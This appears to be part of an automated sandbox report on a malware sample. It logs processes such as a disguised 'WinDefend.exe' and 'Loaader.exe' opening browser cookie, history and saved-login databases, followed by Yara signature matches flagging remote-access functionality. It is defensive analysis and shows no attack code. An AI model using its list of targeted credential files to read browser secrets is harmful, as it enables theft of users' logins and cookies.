Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\64.png Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\256.png Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\128.png Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\96.png Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\192.png Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\128.png Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\128.png Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\192.png Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\32.png Jump to behavior
Source: C:\Users\user\AppData\Roaming\Loaader.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\256.png Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\32.png Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\64.png Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\128.png Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\96.png Jump to behavior
Source: C:\Users\user\AppData\Roaming\Loaader.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\128.png Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\96.png Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\96.png Jump to behavior
Source: C:\Users\user\AppData\Roaming\Loaader.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\96.png Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\192.png Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\48.png Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\32.png Jump to behavior
Source: Yara match File source: 20.2.Loader.exe.1dc20000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.Loaader.exe.1d630000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.Loaader.exe.1d630000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.Loader.exe.1dc20000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.Loader.exe.1d160000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.Loader.exe.1d160000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000014.00000002.2864018440.000000001DC20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2824829342.000000001D160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.3394522285.000000001332A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.3567109190.000000001D630000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.3282228143.0000000003177000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Loader.exe PID: 7384, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Loaader.exe PID: 7392, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 20.2.Loader.exe.1d160000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.Loader.exe.1d160000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000014.00000002.2824829342.000000001D160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Loader.exe PID: 7384, type: MEMORYSTR
Source: Yara match File source: 00000015.00000002.3282228143.0000000003071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Infected.exe PID: 3144, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Loaader.exe PID: 7392, type: MEMORYSTR
Source: Yara match File source: 20.2.Loader.exe.1d160000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.Loader.exe.1d160000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000014.00000002.2824829342.000000001D160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Loader.exe PID: 7384, type: MEMORYSTR